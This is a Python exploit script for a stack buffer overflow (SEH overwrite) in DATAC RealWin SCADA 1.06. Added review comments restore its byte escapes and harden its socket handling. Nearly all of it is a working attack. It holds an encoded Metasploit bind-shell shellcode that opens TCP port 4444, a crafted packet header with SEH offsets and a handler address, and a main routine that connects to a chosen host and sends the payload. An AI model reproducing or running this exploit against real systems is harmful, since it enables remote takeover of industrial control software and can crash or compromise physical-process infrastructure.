# Title : DATAC RealWin SCADA 1.06 Buffer Overflow Exploit
# Published : 2010-10-27
# Author : Blake
# Exploit Title: RealWin SCADA System SEH Overwrite
# Date: 10-27-10
# Author: Blake
# Software Link: http://www.realflex.com/products/realwin/realwin.php
# Version: 1.06
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)
import socket, sys
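# NOTE(review): the published listing lost every backslash, so "x41" was a
# three-character string and "n" a literal letter; the escapes are restored
# here.  All payload pieces are bytes literals (b"...") so the same source
# runs under Python 2 and Python 3 and sendall() gets raw bytes, not text.
#
# The offsets and the SEH handler address are the original author's findings
# against RealWin 1.06 on Windows XP SP3; the handler address (0x4002e3ea) is
# build-specific and must be re-verified against any other target.  The
# shellcode is a Metasploit windows/shell_bind_tcp (LPORT=4444) encoded with
# x86/shikata_ga_nai: a successful run leaves a shell listening on TCP/4444
# on the target, and a failed attempt will most likely crash the RealWin
# service.  Use only against systems you are authorised to test.

try:
    _prompt = raw_input  # Python 2
except NameError:        # Python 3
    _prompt = input

# windows/shell_bind_tcp - 368 bytes, Encoder: x86/shikata_ga_nai, LPORT=4444
SHELLCODE = (
    b"\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4"
    b"\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81"
    b"\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51"
    b"\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\x1a"
    b"\x96\x0e\x70\x61\xca\xf0\x49\xaa\x1f\xf0\x8e\xd7\xef\xa0\x47"
    b"\x93\x5d\x55\xe3\xe1\x5d\x54\x23\x6e\xdd\x2e\x46\xb1\xa9\x84"
    b"\x49\xe2\x01\x92\x02\x1a\x2a\xfc\xb2\x1b\xff\x1e\x8e\x52\x74"
    b"\xd4\x64\x65\x5c\x24\x84\x57\xa0\xeb\xbb\x57\x2d\xf5\xfc\x50"
    b"\xcd\x80\xf6\xa2\x70\x93\xcc\xd9\xae\x16\xd1\x7a\x25\x80\x31"
    b"\x7a\xea\x57\xb1\x70\x47\x13\x9d\x94\x56\xf0\x95\xa1\xd3\xf7"
    b"\x79\x20\xa7\xd3\x5d\x68\x7c\x7d\xc7\xd4\xd3\x82\x17\xb0\x8c"
    b"\x26\x53\x53\xd9\x51\x3e\x3c\x2e\x6c\xc1\xbc\x38\xe7\xb2\x8e"
    b"\xe7\x53\x5d\xa3\x60\x7a\x9a\xc4\x5b\x3a\x34\x3b\x63\x3b\x1c"
    b"\xf8\x37\x6b\x36\x29\x37\xe0\xc6\xd6\xe2\xa7\x96\x78\x5c\x08"
    b"\x47\x39\x0c\xe0\x8d\xb6\x73\x10\xae\x1c\x02\x16\x60\x44\x47"
    b"\xf1\x81\x7a\x76\x5d\x0f\x9c\x12\x4d\x59\x36\x8a\xaf\xbe\x8f"
    b"\x2d\xcf\x94\xa3\xe6\x47\xa0\xad\x30\x67\x31\xf8\x13\xc4\x99"
    b"\x6b\xe7\x06\x1e\x8d\xf8\x02\x36\xc4\xc1\xc5\xcc\xb8\x80\x74"
    b"\xd0\x90\x72\x14\x43\x7f\x82\x53\x78\x28\xd5\x34\x4e\x21\xb3"
    b"\xa8\xe9\x9b\xa1\x30\x6f\xe3\x61\xef\x4c\xea\x68\x62\xe8\xc8"
    b"\x7a\xba\xf1\x54\x2e\x12\xa4\x02\x98\xd4\x1e\xe5\x72\x8f\xcd"
    b"\xaf\x12\x56\x3e\x70\x64\x57\x6b\x06\x88\xe6\xc2\x5f\xb7\xc7"
    b"\x82\x57\xc0\x35\x33\x97\x1b\xfe\x43\xd2\x01\x57\xcc\xbb\xd0"
    b"\xe5\x91\x3b\x0f\x29\xac\xbf\xa5\xd2\x4b\xdf\xcc\xd7\x10\x67"
    b"\x3d\xaa\x09\x02\x41\x19\x29\x07"
)

# 12-byte fixed header sent before the overflow data.  The author does not
# document its fields; presumably a packet type/length -- verify if needed.
HEAD = b"\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00"

# nops + shellcode + trailing filler is always 20 + JUNK2_BASE bytes, so the
# request length does not change when a different shellcode is supplied.
JUNK2_BASE = 7972


def build_payload(shellcode=SHELLCODE):
    """Return the raw request bytes: header, SEH overwrite, shellcode, filler.

    Layout (offsets relative to the start of the request):
      0    HEAD (12 bytes)
      12   228 x 'A' filler
      240  next-SEH: short jmp +6 over the handler pointer
      244  SEH handler: 0x4002e3ea (little-endian) -- overwritten 232 bytes
           past the header, as in the original
      248  20-byte NOP sled, then the shellcode, then 'B' filler and "\\r\\n"

    Raises ValueError if the shellcode does not fit in the filler budget
    (the original silently produced an empty filler in that case).
    """
    if len(shellcode) > JUNK2_BASE:
        raise ValueError("shellcode too large: %d > %d bytes"
                         % (len(shellcode), JUNK2_BASE))
    junk = b"\x41" * 228
    next_seh = b"\xeb\x06\x90\x90"   # jmp +6, lands on the NOP sled
    seh = b"\xea\xe3\x02\x40"        # 4002e3ea, target-build specific
    nops = b"\x90" * 20
    junk2 = b"\x42" * (JUNK2_BASE - len(shellcode))
    return HEAD + junk + next_seh + seh + nops + shellcode + junk2 + b"\r\n"


def main(argv=None):
    """Parse ``<ip> <port>`` from argv, send the payload once, return exit status.

    argv defaults to sys.argv.  Returns 0 on success and 1 on a usage error,
    a non-numeric port, or a failed connection (the original exited 0 on
    every path; a non-zero status is what a shell caller expects on failure).
    """
    argv = sys.argv if argv is None else argv
    if len(argv) != 3:
        print("\n[*] Usage: %s <ip> <port>\n" % argv[0])
        return 1
    host = argv[1]
    try:
        port = int(argv[2])  # port 912 by default
    except ValueError:
        print("[x] Port must be an integer\n")
        return 1

    payload = build_payload()

    print("\n====================================")
    print("DATAC RealWin 1.06 Buffer Overflow")
    print("Written by Blake")
    print("Discovered by Luigi Auriemma")
    print("Tested on Windows XP SP3")
    print("====================================\n")
    print("[*] Connecting to %s on port %d" % (host, port))
    # create_connection resolves the host and applies a timeout, so a
    # filtered port fails loudly instead of hanging; only socket errors are
    # caught -- the original bare except also hid KeyboardInterrupt.
    try:
        sock = socket.create_connection((host, port), timeout=10)
    except socket.error as exc:
        print("[x] Error establishing connection: %s\n" % exc)
        return 1
    try:
        print("[*] Sending payload")
        sock.sendall(payload)  # send() may write only part of 8 KiB
    finally:
        sock.close()
    print("[*] Payload sent")
    _prompt("[*] Press any key to exit...\n")
    return 0


if __name__ == "__main__":
    sys.exit(main())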